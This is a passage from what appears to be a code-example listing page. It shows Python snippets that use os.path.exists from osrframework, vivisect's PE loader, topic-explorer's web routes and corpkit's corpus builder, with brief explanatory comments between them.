                print "Total time used:\t" + str(endTime-startTime)
                print "Average seconds/query:\t" + str((endTime-startTime).total_seconds()/len(listPlatforms)) +" seconds"
                print

            # Urging users to place an issue on Github...
            if not args.maltego:
                print
                print "Did something go wrong? Is a platform reporting false positives? Do you need to integrate a new one?"
                print "Then, place an issue in the Github project: <https://github.com/i3visio/osrframework/issues>."
                print "Note that otherwise, we won't know about it!"
                print

            return res
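
A note on the os.path.exists/os.makedirs pattern used twice above for args.output_folder: checking for the folder and then creating it is slightly racy if something else creates it in between. On Python 3.2+ the check and the creation can be folded into a single call with exist_ok=True. A minimal sketch, assuming only the standard library; the logger name is the one already used in this script:

import logging
import os

logger = logging.getLogger("osrframework.usufy")

def ensure_output_folder(path):
    # Same effect as the exists()/makedirs() pair above, without the race.
    if not os.path.exists(path):
        logger.warning("The output folder '%s' does not exist. It will be created." % path)
    os.makedirs(path, exist_ok=True)

ensure_output_folder("./usufy-output")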

Example 134

Project: vivisect
Source File: pe.py
View license
def loadPeIntoWorkspace(vw, pe, filename=None):

    mach = pe.IMAGE_NT_HEADERS.FileHeader.Machine

    arch = arch_names.get(mach)
    if arch == None:
        raise Exception("Machine %.4x is not supported for PE!" % mach )

    vw.setMeta('Architecture', arch)
    vw.setMeta('Format', 'pe')

    platform = 'windows'

    # Drivers are platform "winkern" so impapi etc works
    subsys = pe.IMAGE_NT_HEADERS.OptionalHeader.Subsystem
    if subsys == PE.IMAGE_SUBSYSTEM_NATIVE:
        platform = 'winkern'

    vw.setMeta('Platform', platform)

    defcall = defcalls.get(arch)
    if defcall:
        vw.setMeta("DefaultCall", defcall)

    # Set ourselves up for extended windows binary analysis

    baseaddr = pe.IMAGE_NT_HEADERS.OptionalHeader.ImageBase
    entry = pe.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint + baseaddr
    entryrva = entry - baseaddr

    codebase = pe.IMAGE_NT_HEADERS.OptionalHeader.BaseOfCode
    codesize = pe.IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode
    codervamax = codebase+codesize

    fvivname = filename

    # This will help linkers with files that are re-named
    dllname = pe.getDllName()
    if dllname != None:
        fvivname = dllname

    if fvivname == None:
        fvivname = "pe_%.8x" % baseaddr

    fhash = "unknown hash"
    if os.path.exists(filename):
        fhash = v_parsers.md5File(filename)

    fname = vw.addFile(fvivname.lower(), baseaddr, fhash)

    symhash = e_symcache.symCacheHashFromPe(pe)
    vw.setFileMeta(fname, 'SymbolCacheHash', symhash)

    # Add file version info if VS_VERSIONINFO has it
    vs = pe.getVS_VERSIONINFO()
    if vs != None:
        vsver = vs.getVersionValue('FileVersion')
        if vsver != None and len(vsver):
            # split on whitespace; some samples contain spaces and nothing else
            parts = vsver.split()
            if len(parts):
                vsver = vsver.split()[0]
                vw.setFileMeta(fname, 'Version', vsver)

    # Setup some va sets used by windows analysis modules
    vw.addVaSet("Library Loads", (("Address", VASET_ADDRESS),("Library", VASET_STRING)))
    vw.addVaSet('pe:ordinals', (('Address', VASET_ADDRESS),('Ordinal',VASET_INTEGER)))

    # SizeOfHeaders spoofable...
    curr_offset = pe.IMAGE_DOS_HEADER.e_lfanew + len(pe.IMAGE_NT_HEADERS) 
    
    secsize = len(vstruct.getStructure("pe.IMAGE_SECTION_HEADER"))
    
    sec_offset = pe.IMAGE_DOS_HEADER.e_lfanew + 4 + len(pe.IMAGE_NT_HEADERS.FileHeader) +  pe.IMAGE_NT_HEADERS.FileHeader.SizeOfOptionalHeader 
    
    if sec_offset != curr_offset:
        header_size = sec_offset + pe.IMAGE_NT_HEADERS.FileHeader.NumberOfSections * secsize
    else:
        header_size = pe.IMAGE_DOS_HEADER.e_lfanew + len(pe.IMAGE_NT_HEADERS) + pe.IMAGE_NT_HEADERS.FileHeader.NumberOfSections * secsize

    # Add the first page mapped in from the PE header.
    header = pe.readAtOffset(0, header_size)


    secalign = pe.IMAGE_NT_HEADERS.OptionalHeader.SectionAlignment

    subsys_majver = pe.IMAGE_NT_HEADERS.OptionalHeader.MajorSubsystemVersion
    subsys_minver = pe.IMAGE_NT_HEADERS.OptionalHeader.MinorSubsystemVersion

    secrem = len(header) % secalign
    if secrem != 0:
        header += "\x00" * (secalign - secrem)

    vw.addMemoryMap(baseaddr, e_mem.MM_READ, fname, header)
    vw.addSegment(baseaddr, len(header), "PE_Header", fname)

    hstruct = vw.makeStructure(baseaddr, "pe.IMAGE_DOS_HEADER")
    magicaddr = hstruct.e_lfanew
    if vw.readMemory(baseaddr + magicaddr, 2) != "PE":
        raise Exception("We only support PE exe's")

    if not vw.isLocation( baseaddr + magicaddr ):
        padloc = vw.makePad(baseaddr + magicaddr, 4)

    ifhdr_va = baseaddr + magicaddr + 4
    ifstruct = vw.makeStructure(ifhdr_va, "pe.IMAGE_FILE_HEADER")

    vw.makeStructure(ifhdr_va + len(ifstruct), "pe.IMAGE_OPTIONAL_HEADER")

    # get resource data directory
    ddir = pe.getDataDirectory(PE.IMAGE_DIRECTORY_ENTRY_RESOURCE)
    loadrsrc = vw.config.viv.parsers.pe.loadresources
    carvepes = vw.config.viv.parsers.pe.carvepes

    deaddirs = [PE.IMAGE_DIRECTORY_ENTRY_EXPORT,
                PE.IMAGE_DIRECTORY_ENTRY_IMPORT,
                PE.IMAGE_DIRECTORY_ENTRY_RESOURCE,
                PE.IMAGE_DIRECTORY_ENTRY_EXCEPTION,
                PE.IMAGE_DIRECTORY_ENTRY_SECURITY,
                PE.IMAGE_DIRECTORY_ENTRY_BASERELOC,
                PE.IMAGE_DIRECTORY_ENTRY_DEBUG,
                PE.IMAGE_DIRECTORY_ENTRY_COPYRIGHT,
                PE.IMAGE_DIRECTORY_ENTRY_ARCHITECTURE,
                PE.IMAGE_DIRECTORY_ENTRY_GLOBALPTR,
                PE.IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG,
                PE.IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT,
                PE.IMAGE_DIRECTORY_ENTRY_IAT,
                PE.IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT,
                PE.IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]
    deadvas = [ddir.VirtualAddress]
    for datadir in deaddirs:
        d = pe.getDataDirectory(datadir)
        if d.VirtualAddress:
            deadvas.append(d.VirtualAddress)

    for idx, sec in enumerate(pe.sections):
        mapflags = 0

        chars = sec.Characteristics
        if chars & PE.IMAGE_SCN_MEM_READ:
            mapflags |= e_mem.MM_READ

            isrsrc = ( sec.VirtualAddress == ddir.VirtualAddress )
            if isrsrc and not loadrsrc:
                continue

            # If it's for an older system, just about anything
            # is executable...
            if not vw.config.viv.parsers.pe.nx and subsys_majver < 6 and not isrsrc:
                mapflags |= e_mem.MM_EXEC

        if chars & PE.IMAGE_SCN_MEM_READ:
            mapflags |= e_mem.MM_READ
        if chars & PE.IMAGE_SCN_MEM_WRITE:
            mapflags |= e_mem.MM_WRITE
        if chars & PE.IMAGE_SCN_MEM_EXECUTE:
            mapflags |= e_mem.MM_EXEC
        if chars & PE.IMAGE_SCN_CNT_CODE:
            mapflags |= e_mem.MM_EXEC


        secrva = sec.VirtualAddress
        secvsize = sec.VirtualSize
        secfsize = sec.SizeOfRawData
        secbase = secrva + baseaddr
        secname = sec.Name.strip("\x00")
        secrvamax = secrva + secvsize
    
        # If the section is part of BaseOfCode->SizeOfCode
        # force execute perms...
        if secrva >= codebase and secrva < codervamax:
            mapflags |= e_mem.MM_EXEC

        # If the entry point is in this section, force execute
        # permissions.
        if secrva <= entryrva and entryrva < secrvamax:
            mapflags |= e_mem.MM_EXEC

        if not vw.config.viv.parsers.pe.nx and subsys_majver < 6 and mapflags & e_mem.MM_READ:
            mapflags |= e_mem.MM_EXEC

        if sec.VirtualSize == 0 or sec.SizeOfRawData == 0:
            if idx+1 >= len(pe.sections):
                continue
            # fill the gap with null bytes.. 
            nsec = pe.sections[idx+1] 
            nbase = nsec.VirtualAddress + baseaddr

            plen = nbase - secbase 
            readsize = sec.SizeOfRawData if sec.SizeOfRawData < sec.VirtualSize else sec.VirtualSize
            secoff = pe.rvaToOffset(secrva)
            secbytes = pe.readAtOffset(secoff, readsize)
            secbytes += "\x00" * plen
            vw.addMemoryMap(secbase, mapflags, fname, secbytes)
            vw.addSegment(secbase, len(secbytes), secname, fname)

            # Mark dead data on resource and import data directories
            if sec.VirtualAddress in deadvas:
                vw.markDeadData(secbase, secbase+len(secbytes))

            #FIXME create a mask for this
            if not (chars & PE.IMAGE_SCN_CNT_CODE) and not (chars & PE.IMAGE_SCN_MEM_EXECUTE) and not (chars & PE.IMAGE_SCN_MEM_WRITE):
                vw.markDeadData(secbase, secbase+len(secbytes))
            continue
        
        # if SizeOfRawData is greater than VirtualSize we'll end up using VS in our read..
        if sec.SizeOfRawData < sec.VirtualSize:
            if sec.SizeOfRawData > pe.filesize: 
                continue
    
        plen = sec.VirtualSize - sec.SizeOfRawData          
    
        try:
            # According to http://code.google.com/p/corkami/wiki/PE#section_table if SizeOfRawData is larger than VirtualSize, VS is used..
            readsize = sec.SizeOfRawData if sec.SizeOfRawData < sec.VirtualSize else sec.VirtualSize

            secoff = pe.rvaToOffset(secrva)
            secbytes = pe.readAtOffset(secoff, readsize)
            secbytes += "\x00" * plen
            vw.addMemoryMap(secbase, mapflags, fname, secbytes)
            vw.addSegment(secbase, len(secbytes), secname, fname)

            # Mark dead data on resource and import data directories
            if sec.VirtualAddress in deadvas:
                vw.markDeadData(secbase, secbase+len(secbytes))

            #FIXME create a mask for this
            if not (chars & PE.IMAGE_SCN_CNT_CODE) and not (chars & PE.IMAGE_SCN_MEM_EXECUTE) and not (chars & PE.IMAGE_SCN_MEM_WRITE):
                vw.markDeadData(secbase, secbase+len(secbytes))

        except Exception, e:
            print("Error Loading Section (%s size:%d rva:%.8x offset: %d): %s" % (secname,secfsize,secrva,secoff,e))

    vw.addExport(entry, EXP_FUNCTION, '__entry', fname)
    vw.addEntryPoint(entry)

    # store the actual reloc section virtual address
    reloc_va = pe.getDataDirectory(PE.IMAGE_DIRECTORY_ENTRY_BASERELOC).VirtualAddress
    if reloc_va:
        reloc_va += baseaddr
    vw.setFileMeta(fname, "reloc_va", reloc_va)

    for rva,rtype in pe.getRelocations():

        # map PE reloc to VIV reloc ( or dont... )
        vtype = relmap.get(rtype)
        if vtype == None:
            continue

        vw.addRelocation(rva+baseaddr, vtype)

    for rva, lname, iname in pe.getImports():
        if vw.probeMemory(rva+baseaddr, 4, e_mem.MM_READ):
            vw.makeImport(rva+baseaddr, lname, iname)

    # Tell vivisect about APIs (ntdll, kernel32, etc.) that don't return...
    vw.addNoReturnApi("ntdll.RtlExitUserThread")
    vw.addNoReturnApi("kernel32.ExitProcess")
    vw.addNoReturnApi("kernel32.ExitThread")
    vw.addNoReturnApi("kernel32.FatalExit")
    vw.addNoReturnApiRegex("^msvcr.*\._CxxThrowException$")
    vw.addNoReturnApiRegex("^msvcr.*\.abort$")
    vw.addNoReturnApi("ntoskrnl.KeBugCheckEx")

    exports = pe.getExports()
    for rva, ord, name in exports:
        eva = rva + baseaddr
        try:
            vw.setVaSetRow('pe:ordinals', (eva,ord))
            vw.addExport(eva, EXP_UNTYPED, name, fname)
            if vw.probeMemory(eva, 1, e_mem.MM_EXEC):
                vw.addEntryPoint(eva)
        except Exception, e:
            vw.vprint('addExport Failed: %s.%s (0x%.8x): %s' % (fname,name,eva,e))

    # Save off the ordinals...
    vw.setFileMeta(fname, 'ordinals', exports)

    fwds = pe.getForwarders()
    for rva, name, forwardname in fwds:
        vw.makeName(rva+baseaddr, "forwarder_%s.%s" % (fname, name))
        vw.makeString(rva+baseaddr)

    vw.setFileMeta(fname, 'forwarders', fwds)

    # Check For SafeSEH list...
    if pe.IMAGE_LOAD_CONFIG != None:

        vw.setFileMeta(fname, "SafeSEH", True)

        va = pe.IMAGE_LOAD_CONFIG.SEHandlerTable
        if va != 0:
            vw.makeName(va, "%s.SEHandlerTable" % fname)
            count = pe.IMAGE_LOAD_CONFIG.SEHandlerCount
            # RP BUG FIX - sanity check the count
            if count * 4 < pe.filesize and vw.isValidPointer(va):
                # XXX - CHEAP HACK: for some reason we still have binaries throwing issues here..
                
                try:
                    # Just cheat and use the workspace with memory maps in it already
                    for h in vw.readMemoryFormat(va, "<%dP" % count):
                        sehva = baseaddr + h
                        vw.addEntryPoint(sehva)
                        #vw.hintFunction(sehva, meta={'SafeSEH':True})
                except:
                    vw.vprint("SEHandlerTable parse error")

    # Last but not least, see if we have symbol support and use it if we do
    if vt_win32.dbghelp:

        s = vt_win32.Win32SymbolParser(-1, filename, baseaddr)

        # We don't want exports or whatever because we already have them
        s.symopts |= vt_win32.SYMOPT_EXACT_SYMBOLS
        s.parse()

        # Add names for any symbols which are missing them
        for symname, symva, size, flags in s.symbols:

            if not vw.isValidPointer(symva):
                continue

            try:

                if vw.getName(symva) == None:
                    vw.makeName(symva, symname, filelocal=True)

            except Exception, e:
                vw.vprint("Symbol Load Error: %s" % e)

        # Also, lets set the locals/args name hints if we found any
        vw.setFileMeta(fname, 'PELocalHints', s._sym_locals)

    # if it has an EXCEPTION directory parse if it has the pdata
    edir = pe.getDataDirectory(PE.IMAGE_DIRECTORY_ENTRY_EXCEPTION)
    if edir.VirtualAddress and arch == 'amd64':
        va = edir.VirtualAddress + baseaddr
        vamax = va + edir.Size
        while va < vamax:
            f = vw.makeStructure(va, 'pe.IMAGE_RUNTIME_FUNCTION_ENTRY')
            if not vw.isValidPointer(baseaddr + f.UnwindInfoAddress):
                break

            # FIXME UNWIND_INFO *requires* DWORD alignment, how is it enforced?
            fva = f.BeginAddress + baseaddr
            uiva = baseaddr + f.UnwindInfoAddress
            # Possible method 1...
            #uiva = baseaddr + (f.UnwindInfoAddress & 0xfffffffc )

            # Possible method 2...
            #uirem = f.UnwindInfoAddress % 4
            #if uirem:
                #uiva += ( 4 - uirem )
            uinfo = vw.getStructure(uiva, 'pe.UNWIND_INFO')
            ver = uinfo.VerFlags & 0x7
            if ver != 1:
                vw.vprint('Unwind Info Version: %d (bailing on .pdata)' % ver)
                break

            flags = uinfo.VerFlags >> 3
            # Check if it's a function *block* rather than a function *entry*
            if not (flags & PE.UNW_FLAG_CHAININFO):
                vw.addEntryPoint(fva)

            va += len(f)

    # auto-mark embedded PEs as "dead data" to prevent code flow...
    if carvepes: 
        pe.fd.seek(0)
        fbytes = pe.fd.read()
        for offset, i in pe_carve.carve(fbytes, 1):
            # Found a sub-pe!
            subpe = pe_carve.CarvedPE(fbytes, offset, chr(i))
            pebytes = subpe.readAtOffset(0, subpe.getFileSize())
            rva = pe.offsetToRva(offset)
            vw.markDeadData(rva, rva+len(pebytes))

    return fname
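
The fhash logic near the top of this loader only hashes the input when os.path.exists(filename) is true, and otherwise falls back to the "unknown hash" placeholder (useful when the PE arrives as a memory image rather than a file on disk). A standalone sketch of the same guard, using hashlib in place of vivisect's v_parsers.md5File:

import hashlib
import os

def file_md5_or_default(path, default="unknown hash"):
    # Mirror the loader above: only hash when the path really exists on disk.
    if path is None or not os.path.exists(path):
        return default
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

print(file_md5_or_default("/etc/hosts"))
print(file_md5_or_default(None))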

Example 135

Project: topic-explorer
Source File: server.py
View license
    def _setup_routes(self, **kwargs):
        @self.route('/<k:int>/doc_topics/<doc_id>')
        @_set_acao_headers
        def doc_topic_csv(k, doc_id):
            response.content_type = 'text/csv; charset=UTF8'

            doc_id = unquote(doc_id)

            data = self.v[k].doc_topics(doc_id)

            output = StringIO()
            writer = csv.writer(output)
            writer.writerow(['topic', 'prob'])
            writer.writerows([(t, "%6f" % p) for t, p in data])

            return output.getvalue()

        @self.route('/<k:int>/docs/<doc_id>')
        @_set_acao_headers
        def doc_csv(k, doc_id, threshold=0.2):
            response.content_type = 'text/csv; charset=UTF8'

            doc_id = unquote(doc_id)

            data = self.v[k].dist_doc_doc(doc_id)

            output = StringIO()
            writer = csv.writer(output)
            writer.writerow(['doc', 'prob'])
            writer.writerows([(d, "%6f" % p) for d, p in data if p > threshold])

            return output.getvalue()

        @self.route('/<k:int>/topics/<topic_no:int>.json')
        @_set_acao_headers
        def topic_json(k, topic_no, N=40):
            response.content_type = 'application/json; charset=UTF8'
            try:
                N = int(request.query.n)
            except:
                pass

            if N > 0:
                data = self.v[k].dist_top_doc([topic_no])[:N]
            else:
                data = self.v[k].dist_top_doc([topic_no])[N:]
                data = reversed(data)

            docs = [doc for doc, prob in data]
            doc_topics_mat = self.v[k].doc_topics(docs)
            docs = self.get_docs(docs, id_as_key=True)

            js = []
            for doc_prob, topics in zip(data, doc_topics_mat):
                doc, prob = doc_prob
                struct = docs[doc]
                struct.update({'prob': 1 - prob,
                               'topics': dict([(str(t), float(p)) for t, p in topics])})
                js.append(struct)

            return json.dumps(js)

        @self.route('/<k:int>/docs_topics/<doc_id:path>.json')
        @_set_acao_headers
        def doc_topics(k, doc_id, N=40):
            try:
                N = int(request.query.n)
            except:
                pass

            doc_id = unquote(doc_id)

            response.content_type = 'application/json; charset=UTF8'

            if N > 0:
                data = self.v[k].dist_doc_doc(doc_id)[:N]
            else:
                data = self.v[k].dist_doc_doc(doc_id)[N:]
                data = reversed(data)

            docs = [doc for doc, prob in data]
            doc_topics_mat = self.v[k].doc_topics(docs)
            docs = self.get_docs(docs, id_as_key=True)

            js = []
            for doc_prob, topics in zip(data, doc_topics_mat):
                doc, prob = doc_prob
                struct = docs[doc]
                struct.update({'prob': 1 - prob,
                               'topics': dict([(str(t), float(p)) for t, p in topics])})
                js.append(struct)

            return json.dumps(js)

        @self.route('/<k:int>/word_docs.json')
        @_set_acao_headers
        def word_docs(k, N=40):
            try:
                N = int(request.query.n)
            except:
                pass
            try:
                query = request.query.q.lower().split('|')
            except:
                raise Exception('Must specify a query')

            response.content_type = 'application/json; charset=UTF8'

            query = [word for word in query if word in self.c.words]

            # abort if there are no terms in the query
            if not query:
                response.status = 400  # Bad Request
                return "Search terms not in model"

            topics = self.v[k].dist_word_top(query, show_topics=False)
            data = self.v[k].dist_top_doc(topics['i'],
                                          weights=(topics['value'].max() - topics['value']))

            if N > 0:
                data = data[:N]
            else:
                data = data[N:]
                data = reversed(data)

            docs = [doc for doc, prob in data]
            doc_topics_mat = self.v[k].doc_topics(docs)
            docs = self.get_docs(docs, id_as_key=True)

            js = []
            for doc_prob, topics in zip(data, doc_topics_mat):
                doc, prob = doc_prob
                struct = docs[doc]
                struct.update({'prob': 1 - prob,
                               'topics': dict([(str(t), p) for t, p in topics])})
                js.append(struct)

            return json.dumps(js)

        @self.route('/<k:int>/topics.json')
        @_set_acao_headers
        def topics(k):
            from topicexplorer.lib.color import rgb2hex

            response.content_type = 'application/json; charset=UTF8'
            response.set_header('Expires', _cache_date())
            response.set_header('Cache-Control', 'max-age=86400')
            

            # populate partial jsd values
            data = self.v[k].topic_jsds()

            js = {}
            for rank, topic_H in enumerate(data):
                topic, H = topic_H
                if math.isnan(H): 
                    H = 0.0
                js[str(topic)] = {
                    "H": float(H),
                    "color": rgb2hex(self.colors[k][topic])
                }

            # populate word values
            data = self.v[k].topics()

            wordmax = 10  # for alphabetic languages
            if kwargs.get('lang', None) == 'cn':
                wordmax = 25  # for ideographic languages

            for i, topic in enumerate(data):
                js[str(i)].update({'words': dict([(unicode(w), float(p))
                                                  for w, p in topic[:wordmax]])})

            return json.dumps(js)

        @self.route('/topics.json')
        @_set_acao_headers
        def word_topic_distance():
            import numpy as np
            response.content_type = 'application/json; charset=UTF8'

            # parse query
            try:
                if '|' in request.query.q:
                    query = request.query.q.lower().split('|')
                else:
                    query = request.query.q.lower().split(' ')
            except:
                raise Exception('Must specify a query')

            query = [word for word in query if word in self.c.words]

            # abort if there are no terms in the query
            if not query:
                response.status = 400  # Bad Request
                return "Search terms not in model"


            # calculate distances
            distances = dict()
            for k, viewer in self.v.iteritems():
                d = viewer.dist_word_top(query, show_topics=False)
                distances[k] = np.fromiter(
                    ((k, row['i'], row['value']) for row in d),
                    dtype=[('k', '<i8'), ('i', '<i8'), ('value', '<f8')])

            # merge and sort all topics across all models
            merged_similarity = np.hstack(distances.values())
            sorted_topics = merged_similarity[np.argsort(merged_similarity['value'])]

            # return data
            data = [{'k' : t['k'],
                     't' : t['i'],
                     'distance' : t['value'] } for t in sorted_topics]
            return json.dumps(data)


        @self.route('/topics')
        @_set_acao_headers
        def view_clusters():
            with open(resource_filename(__name__, '../www/master.mustache.html'),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'body' : _render_template('cluster.mustache.html'),
                           'topic_range': self.topic_range}
            return self.renderer.render(template, tmpl_params)


        @self.route('/docs.json')
        @_set_acao_headers
        def docs(docs=None, q=None):
            response.content_type = 'application/json; charset=UTF8'
            response.set_header('Expires', _cache_date())

            try:
                if request.query.q:
                    q = unquote(request.query.q)
            except:
                pass

            try:
                if request.query.id:
                    docs = [unquote(request.query.id)]
            except:
                pass

            try:
                response.set_header('Expires', 0)
                response.set_header('Pragma', 'no-cache')
                response.set_header('Cache-Control', 'no-cache, no-store, must-revalidate')
                if request.query.random:
                    docs = [random.choice(self.labels)]
            except:
                pass

            js = self.get_docs(docs, query=q)

            return json.dumps(js)

        @self.route('/icons.js')
        def icons():
            with open(resource_filename(__name__, '../www/icons.js')) as icons:
                text = '{0}\n var icons = {1};'\
                    .format(icons.read(), json.dumps(self.icons))
            return text

        def _render_template(page):
            response.set_header('Expires', _cache_date())

            with open(resource_filename(__name__, '../www/' + page),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'corpus_name': kwargs.get('corpus_name', ''),
                           'corpus_link': kwargs.get('corpus_link', ''),
                           'context_type': self.context_type,
                           'topic_range': self.topic_range,
                           'doc_title_format': kwargs.get('doc_title_format', '{0}'),
                           'doc_url_format': kwargs.get('doc_url_format', ''),
                           'home_link': kwargs.get('home_link', '/')}
            return self.renderer.render(template, tmpl_params)

        @self.route('/<k:int>/')
        def index(k):
            with open(resource_filename(__name__, '../www/master.mustache.html'),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'body' : _render_template('bars.mustache.html'),
                           'topic_range': self.topic_range}
            return self.renderer.render(template, tmpl_params)

        @self.route('/cluster.csv')
        @_set_acao_headers
        def cluster_csv(second=False):
            filename = kwargs.get('cluster_path')
            print "Retrieving cluster.csv:", filename
            if not filename or not os.path.exists(filename):
                import topicexplorer.train
                filename = topicexplorer.train.cluster(10, self.config_file)
                kwargs['cluster_path'] = filename

            root, filename = os.path.split(filename)
            return static_file(filename, root=root)
        
        @self.route('/description.md')
        @_set_acao_headers
        def description():
            filename = kwargs.get('corpus_desc')
            if not filename:
                response.status = 404
                return "File not found"
            root, filename = os.path.split(filename)
            return static_file(filename, root=root)
        
        @self.route('/')
        @_set_acao_headers
        def cluster():
            with open(resource_filename(__name__, '../www/master.mustache.html'),
                      encoding='utf-8') as tmpl_file:
                template = tmpl_file.read()

            tmpl_params = {'body' : _render_template('splash.mustache.html'),
                           'topic_range': self.topic_range}
            return self.renderer.render(template, tmpl_params)

        @self.route('/<filename:path>')
        @_set_acao_headers
        def send_static(filename):
            return static_file(filename, root=resource_filename(__name__, '../www/'))
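
The cluster_csv route above rebuilds cluster.csv only when the configured path is missing or os.path.exists() says it is gone, then remembers the freshly built path. The same check-then-build-then-cache pattern, reduced to the standard library (the build callable here is a hypothetical stand-in for topicexplorer.train.cluster):

import os

def get_or_build(path, build):
    # build() is any callable that creates the file and returns its path.
    if not path or not os.path.exists(path):
        path = build()
    return path

def _build_dummy_csv():
    out = "cluster.csv"
    with open(out, "w") as f:
        f.write("doc,cluster\n")
    return out

csv_path = get_or_build(None, _build_dummy_csv)
print(os.path.exists(csv_path))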

Example 136

Project: corpkit
Source File: make.py
View license
def make_corpus(unparsed_corpus_path,
                project_path=None,
                parse=True,
                tokenise=False,
                postag=False,
                lemmatise=False,
                corenlppath=False,
                nltk_data_path=False,
                operations=False,
                speaker_segmentation=False,
                root=False,
                multiprocess=False,
                split_texts=400,
                outname=False,
                metadata=False,
                restart=False,
                coref=True,
                lang='en',
                **kwargs):
    """
    Create a parsed version of unparsed_corpus using CoreNLP or NLTK's tokeniser
    :param unparsed_corpus_path: path to corpus containing text files, 
                                 or subdirs containing text files
    :type unparsed_corpus_path: str
    
    :param project_path: path to corpkit project
    :type project_path: str

    :param parse: Do parsing?
    :type parse: bool
    
    :param tokenise: Do tokenising?
    :type tokenise: bool
    
    :param corenlppath: folder containing corenlp jar files
    :type corenlppath: str
    
    :param nltk_data_path: path to tokeniser if tokenising
    :type nltk_data_path: str
    
    :param operations: which kinds of annotations to do
    :type operations: str
    
    :param speaker_segmentation: add speaker name to parser output if your corpus is script-like:
    :type speaker_segmentation: bool
    :returns: list of paths to created corpora
    """

    import sys
    import os
    from os.path import join, isfile, isdir, basename, splitext, exists
    import shutil
    import codecs
    from corpkit.build import folderise, can_folderise
    from corpkit.process import saferead, make_dotfile

    from corpkit.build import (get_corpus_filepaths, 
                               check_jdk, 
                               rename_all_files,
                               make_no_id_corpus, parse_corpus, move_parsed_files)
    from corpkit.constants import REPEAT_PARSE_ATTEMPTS

    if parse is True and tokenise is True:
        raise ValueError('Select either parse or tokenise, not both.')
    
    if project_path is None:
        project_path = os.getcwd()


    fileparse = isfile(unparsed_corpus_path)
    if fileparse:
        copier = shutil.copyfile
    else:
        copier = shutil.copytree

    # raise error if no tokeniser
    #if tokenise:
    #    if outname:
    #        newpath = os.path.join(os.path.dirname(unparsed_corpus_path), outname)
    #    else:
    #        newpath = unparsed_corpus_path + '-tokenised'
    #    if isdir(newpath):
    #        shutil.rmtree(newpath)
    #    import nltk
    #    if nltk_data_path:
    #        if nltk_data_path not in nltk.data.path:
    #            nltk.data.path.append(nltk_data_path)
    #    try:
    #        from nltk import word_tokenize as tokenise
    #    except:
    #        print('\nTokeniser not found. Pass in its path as keyword arg "nltk_data_path = <path>".\n')
    #        raise

    if sys.platform == "darwin":
        if not check_jdk():
            print("Get the latest Java from http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html")

    cop_head = kwargs.get('copula_head', True)
    note = kwargs.get('note', False)
    stdout = kwargs.get('stdout', False)

    # make absolute path to corpus
    unparsed_corpus_path = os.path.abspath(unparsed_corpus_path)

    # move it into project
    if fileparse:
        datapath = project_path
    else:
        datapath = join(project_path, 'data')
    
    if isdir(datapath):
        newp = join(datapath, basename(unparsed_corpus_path))
    else:
        os.makedirs(datapath)
        if fileparse:
            noext = splitext(unparsed_corpus_path)[0]
            newp = join(datapath, basename(noext))
        else:
            newp = join(datapath, basename(unparsed_corpus_path))

    if exists(newp):
        pass
    else:
        copier(unparsed_corpus_path, newp)
    
    unparsed_corpus_path = newp

    # ask to folderise?
    check_do_folderise = False
    do_folderise = kwargs.get('folderise', None)
    if can_folderise(unparsed_corpus_path):
        import __main__ as main
        if do_folderise is None and not hasattr(main, '__file__'):
            check_do_folderise = INPUTFUNC("Your corpus has multiple files, but no subcorpora. "\
                                 "Would you like each file to be treated as a subcorpus? (y/n) ")
            check_do_folderise = check_do_folderise.lower().startswith('y')
        if check_do_folderise or do_folderise:
            folderise(unparsed_corpus_path)
            
    # this is bad!
    if join('data', 'data') in unparsed_corpus_path:
        unparsed_corpus_path = unparsed_corpus_path.replace(join('data', 'data'), 'data')

    def chunks(l, n):
        for i in range(0, len(l), n):
            yield l[i:i+n]

    if parse or tokenise:
        
        # this loop shortens files containing more than `split_texts` lines,
        # for corenlp memory's sake. maybe the user needs a warning or
        # something in case they are doing coref?
        for rootx, dirs, fs in os.walk(unparsed_corpus_path):
            for f in fs:
                if f.startswith('.'):
                    continue
                fp = join(rootx, f)
                data, enc = saferead(fp)
                data = data.splitlines()
                if len(data) > split_texts:
                    chk = chunks(data, split_texts)
                    for index, c in enumerate(chk):
                        newname = fp.replace('.txt', '-%s.txt' % str(index + 1).zfill(3))
                        # does this work?
                        if PYTHON_VERSION == 2:
                            with codecs.open(newname, 'w', encoding=enc) as fo:
                                txt = '\n'.join(c) + '\n'
                                fo.write(txt.encode(enc))
                        else:
                            with open(newname, 'w', encoding=enc) as fo:
                                txt = '\n'.join(c) + '\n'
                                fo.write(txt)

                    os.remove(fp)
                else:
                    pass
                    #newname = fp.replace('.txt', '-000.txt')
                    #os.rename(fp, newname)

        if speaker_segmentation or metadata:
            if outname:
                newpath = os.path.join(os.path.dirname(unparsed_corpus_path), outname)
            else:
                newpath = unparsed_corpus_path + '-parsed'
            if restart:
                restart = newpath
            if isdir(newpath) and not root:
                import __main__ as main
                if not restart and not hasattr(main, '__file__'):
                    ans = INPUTFUNC('\n Path exists: %s. Do you want to overwrite? (y/n)\n' %newpath)
                    if ans.lower().strip()[0] == 'y':
                        shutil.rmtree(newpath)
                    else:
                        return
            elif isdir(newpath) and root:
                raise OSError('Path exists: %s' % newpath)
            if speaker_segmentation:
                print('Processing speaker IDs ...')
            make_no_id_corpus(unparsed_corpus_path,
                              unparsed_corpus_path + '-stripped',
                              metadata_mode=metadata,
                              speaker_segmentation=speaker_segmentation)
            to_parse = unparsed_corpus_path + '-stripped'
        else:
            to_parse = unparsed_corpus_path

        if not fileparse:
            print('Making list of files ... ')

        # now we enter a while loop while not all files are parsed
        #todo: these file lists are not necessary when not parsing

        while REPEAT_PARSE_ATTEMPTS:

            if not parse:
                break

            if not fileparse:
                pp = os.path.dirname(unparsed_corpus_path)
                # if restart mode, the filepaths won't include those already parsed...
                filelist, fs = get_corpus_filepaths(projpath=pp, 
                                                corpuspath=to_parse,
                                                restart=restart,
                                                out_ext=kwargs.get('output_format'))

            else:
